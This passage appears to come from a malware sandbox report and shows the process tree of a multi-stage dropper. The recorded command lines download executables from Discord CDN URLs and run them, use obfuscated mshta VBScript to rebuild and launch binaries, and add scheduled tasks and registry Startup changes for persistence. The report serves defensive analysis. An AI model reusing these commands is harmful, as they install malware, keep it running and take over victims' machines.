                  sig: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
      PID 540  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Mon1348816450.exe
          sig: Suspicious use of WriteProcessMemory
        PID 1464  C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exe
            cmd: Mon1348816450.exe
            sig: Executes dropped EXE
      PID 764  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Mon13459b4085.exe
          sig: Suspicious use of WriteProcessMemory
        PID 1376  C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe
            cmd: Mon13459b4085.exe
            sig: Executes dropped EXE
      PID 876  C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe
          sig: Suspicious use of WriteProcessMemory
        PID 1640  C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe
            cmd: Mon13136643d24e51.exe
            sig: Executes dropped EXE
          PID 4404  C:\Users\Admin\Pictures\Adobe Films\gN6O2dq2WbhTm6fJh8uI6Yim.exe
          PID 5560  C:\Users\Admin\Pictures\Adobe Films\2pxQh0RIhP1_2eIKt4DiswNe.exe
            PID 3804  C:\Users\Admin\Documents\0TgdVaMVlWcbBmGmRMGxJ3IH.exe
              PID 664  C:\Users\Admin\Pictures\Adobe Films\HlulqWBz8a9zsE6VDUWOipBs.exe
              PID 5268  C:\Users\Admin\Pictures\Adobe Films\62nf1QfZnZBgBmfbNYQtBOHN.exe
              PID 7052  C:\Users\Admin\Pictures\Adobe Films\Ha9gXlhGWwGJxfMjgAQhtHFn.exe
                PID 960  C:\Windows\SysWOW64\cmd.exe
                    cmd: cmd.exe /c taskkill /f /im chrome.exe
                  PID 2020  C:\Windows\SysWOW64\taskkill.exe
                      cmd: taskkill /f /im chrome.exe
                      sig: Kills process with taskkill
              PID 6404  C:\Users\Admin\Pictures\Adobe Films\V3jNMH1ylQbvw88MBTOlnGUc.exe
              PID 5408  C:\Users\Admin\Pictures\Adobe Films\97EgE0NFBrxWbeB_jyyKm6w2.exe
              PID 4440  C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe
                PID 6976  C:\Users\Admin\AppData\Local\Temp\is-I95G5.tmp\b20TIJmqcW5FHR9QYQn2ctA5.tmp
                    cmd: "C:\Users\Admin\AppData\Local\Temp\is-I95G5.tmp\b20TIJmqcW5FHR9QYQn2ctA5.tmp" /SL5="$A0058,506127,422400,C:\Users\Admin\Pictures\Adobe Films\b20TIJmqcW5FHR9QYQn2ctA5.exe"
                  PID 5988  C:\Users\Admin\AppData\Local\Temp\is-4AOKR.tmp\lakazet.exe
                      cmd: "C:\Users\Admin\AppData\Local\Temp\is-4AOKR.tmp\lakazet.exe" /S /UID=2709
              PID 1240  C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe
                PID 3240  C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe
                    cmd: "C:\Users\Admin\Pictures\Adobe Films\_ErsoofZPN6myvRecVPDvo3t.exe" -u
              PID 5448  C:\Users\Admin\Pictures\Adobe Films\uuRwsRBBygyLfdc3r7TifpNf.exe
            PID 3796  C:\Windows\SysWOW64\schtasks.exe
                cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                sig: Creates scheduled task(s)
            PID 4296  C:\Windows\SysWOW64\schtasks.exe
                cmd: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                sig: Creates scheduled task(s)
          PID 5676  C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe
            PID 5912  C:\Windows\system32\cmd.exe
                cmd: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\3EEB.bat "C:\Users\Admin\Pictures\Adobe Films\vo7gM1WgFlIHRA3ee6pfKIPW.exe""
              PID 5796  C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
              PID 4492  C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828711157309470/18.exe" "18.exe" "" "" "" "" "" ""
              PID 4144  C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828757600858142/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
              PID 1908  C:\Users\Admin\AppData\Local\Temp\28846\18.exe
                  cmd: 18.exe
              PID 908  C:\Users\Admin\AppData\Local\Temp\28846\Transmissibility.exe
                  cmd: Transmissibility.exe
              PID 1120  C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe
                  cmd: C:\Users\Admin\AppData\Local\Temp\3EE9.tmp\3EEA.tmp\extd.exe "" "" "" "" "" "" "" "" ""
          PID 5868  C:\Users\Admin\Pictures\Adobe Films\MwrYFdDwXMjBNPBXln8Qxvw6.exe
          PID 5980  C:\Users\Admin\Pictures\Adobe Films\ZSgqt8nl8BBcMk6806AnfgO0.exe
          PID 6008  C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe
            PID 3460  C:\Users\Admin\Pictures\Adobe Films\GIVkx62dQqNgqlXffRYYiDBU.exe
          PID 6124  C:\Users\Admin\Pictures\Adobe Films\S3BTMsvx1awTSaJavTtOP4zy.exe
            PID 3756  C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 488
                sig: Program crash
          PID 5924  C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe
            PID 1344  C:\Users\Admin\Pictures\Adobe Films\4mD7jNGIXa2yvYiRXhV0y8_9.exe
          PID 5152  C:\Users\Admin\Pictures\Adobe Films\brdu1HxjJmQNBE_LCEBrVrj0.exe
          PID 1296  C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe
            PID 6768  C:\Windows\SysWOW64\cmd.exe
                cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AjW2kk0fyqYsAJo9tWM9KfZh.exe" & del C:\ProgramData\*.dll & exit
              PID 6088  C:\Windows\SysWOW64\taskkill.exe
                  cmd: taskkill /im AjW2kk0fyqYsAJo9tWM9KfZh.exe /f
                  sig: Kills process with taskkill
          PID 4248  C:\Users\Admin\Pictures\Adobe Films\GVoH0wxewvdvviYeQefkeDfr.exe
          PID 2304  C:\Users\Admin\Pictures\Adobe Films\0SVzRqtrLqGszUttRCSPtStG.exe
            PID 4768  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          PID 5984  C:\Users\Admin\Pictures\Adobe Films\dUPufBp8b5UpL7b5PL6rD4NL.exe
          PID 5864  C:\Users\Admin\Pictures\Adobe Films\ouukX2gWm4bOReO9fMEOPQwO.exe
          PID 5528  C:\Users\Admin\Pictures\Adobe Films\47ueqKbktwMvOe6Oaq3dHYym.exe
          PID 528  C:\Users\Admin\Pictures\Adobe Films\NDQQZfY1FgbG9sgWkG3WufVk.exe
          PID 5688  C:\Users\Admin\Pictures\Adobe Films\udC2PFiAM7CV1pDxqCKMkAKi.exe
          PID 5960  C:\Users\Admin\Pictures\Adobe Films\3YBEzT78hGZQ25Kuo6k2BPiA.exe
          PID 5248  C:\Users\Admin\Pictures\Adobe Films\NOfoq72wcAoFEU3DklhMhNDX.exe
            PID 3768  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
          PID 5472  C:\Users\Admin\Pictures\Adobe Films\M6nnRwpfN_C9M2bpsXh11Hv1.exe
          PID 4320  C:\Users\Admin\Pictures\Adobe Films\9OvPWBAzbH2v3X4H8qUPtoi1.exe
            PID 5352  C:\Users\Admin\AppData\Roaming\6555363.exe
            PID 4484  C:\Users\Admin\AppData\Roaming\1231861.exe
            PID 4296  C:\Users\Admin\AppData\Roaming\3771250.exe
            PID 6756  C:\Users\Admin\AppData\Roaming\2114247.exe
            PID 6664  C:\Users\Admin\AppData\Roaming\329851.exe
              PID 6320  C:\Users\Admin\AppData\Roaming\5341808.exe
                PID 1644  C:\Windows\SysWOW64\mshta.exe
                    cmd: "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\5341808.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\5341808.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )
                  PID 5972  C:\Windows\SysWOW64\cmd.exe
                      cmd: "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\5341808.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\5341808.exe" ) do taskkill -IM "%~NxL" -F
                    PID 4244  C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe
                        cmd: ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM
                      PID 5268  C:\Windows\SysWOW64\mshta.exe
                          cmd: "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE( CREaTeOBJeCT( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0,trUE ) )
                        PID 5156  C:\Windows\SysWOW64\cmd.exe
                            cmd: "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F
                      PID 4280  C:\Windows\SysWOW64\mshta.exe
                          cmd: "C:\Windows\System32\mshta.exe" Vbscript:CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly &DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ))
                        PID 4904  C:\Windows\SysWOW64\cmd.exe
                            cmd: "C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G& coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly&DEl /q *&stArT msiexec.exe -Y ..\VYGDVP.ly
                          PID 2856  C:\Windows\SysWOW64\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                          PID 4564  C:\Windows\SysWOW64\cmd.exe
                              cmd: C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"
                          PID 3236  C:\Windows\SysWOW64\msiexec.exe
                              cmd: msiexec.exe -Y ..\VYGDVP.ly
                    PID 7084  C:\Windows\SysWOW64\taskkill.exe
                        cmd: taskkill -IM "5341808.exe" -F
                        sig: Kills process with taskkill
              PID 5720  C:\Users\Admin\AppData\Roaming\679400.exe
            PID 6832  C:\Users\Admin\AppData\Roaming\8035666.exe
          PID 4508  C:\Users\Admin\Pictures\Adobe Films\Kf6ErwGMDmCrxkubyQ_ZPBpZ.exe
-
-
C:\Users\Admin\Pictures\Adobe Films\Y4ZhZNkfjQADSsZuikB97aBz.exe"C:\Users\Admin\Pictures\Adobe Films\Y4ZhZNkfjQADSsZuikB97aBz.exe"6⤵PID:4820
-
-
C:\Users\Admin\Pictures\Adobe Films\ckqFusKz3ejFYHZN4zbmq6eq.exe"C:\Users\Admin\Pictures\Adobe Films\ckqFusKz3ejFYHZN4zbmq6eq.exe"6⤵PID:3924
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"7⤵PID:6008
-
-
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"7⤵PID:4688
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵PID:6040
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"6⤵PID:6208
-
C:\Users\Admin\AppData\Local\Temp\is-MRE6R.tmp\nNFzGY3rEEGDjITMe8Djxu8g.tmp"C:\Users\Admin\AppData\Local\Temp\is-MRE6R.tmp\nNFzGY3rEEGDjITMe8Djxu8g.tmp" /SL5="$10404,506127,422400,C:\Users\Admin\Pictures\Adobe Films\nNFzGY3rEEGDjITMe8Djxu8g.exe"7⤵PID:4632
-
C:\Users\Admin\AppData\Local\Temp\is-PAD7H.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-PAD7H.tmp\lakazet.exe" /S /UID=27098⤵PID:6904
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13073304e5395.exe4⤵PID:440
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exeMon13073304e5395.exe5⤵
- Executes dropped EXE
PID:2764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe4⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon134ab4d3e88a4d3e.exeMon134ab4d3e88a4d3e.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:2800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo4⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exeMon13470f9aa951f871.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe4⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13a2838ed1d8384.exeMon13a2838ed1d8384.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3952 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:316
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:5716
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe4⤵PID:2184
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exeMon13248c3d7ea8c81.exe5⤵
- Executes dropped EXE
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe4⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon13be6b39578.exe4⤵PID:1496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13be6b39578.exeMon13be6b39578.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4416 -
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"2⤵PID:2824
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\3⤵PID:5064
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\4⤵PID:4240
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F3⤵
- Creates scheduled task(s)
PID:5024
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exeMon13bb1ac8986b773.exe1⤵
- Executes dropped EXE
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exeC:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe2⤵PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exeMon13470f9aa951f871.exe /mixtwo1⤵
- Executes dropped EXE
PID:4756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4756 -s 7802⤵
- Program crash
PID:3496
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe" /SILENT1⤵PID:1920
-
C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp"C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp" /SL5="$401D8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe" /SILENT2⤵PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe"C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe" -u1⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp"C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp" /SL5="$401E0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13073304e5395.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5056
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2992 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5020
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5596
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq &cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ+ M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F1⤵PID:3796
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "2⤵PID:6052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>XlaE8u7.Rq"2⤵PID:5720
-
-
C:\Windows\SysWOW64\control.execontrol.exe .\PcAKEO.F2⤵PID:2616
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F3⤵PID:5024
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\PcAKEO.F4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4696 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\PcAKEO.F5⤵PID:1724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exeC:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe1⤵PID:4000
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6504 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6528
-
-
C:\Users\Admin\AppData\Local\Temp\C48F.exeC:\Users\Admin\AppData\Local\Temp\C48F.exe1⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\C48F.exeC:\Users\Admin\AppData\Local\Temp\C48F.exe2⤵PID:2384
-
-
C:\Users\Admin\AppData\Local\Temp\F4D8.exeC:\Users\Admin\AppData\Local\Temp\F4D8.exe1⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\F4D8.exeC:\Users\Admin\AppData\Local\Temp\F4D8.exe2⤵PID:2588
-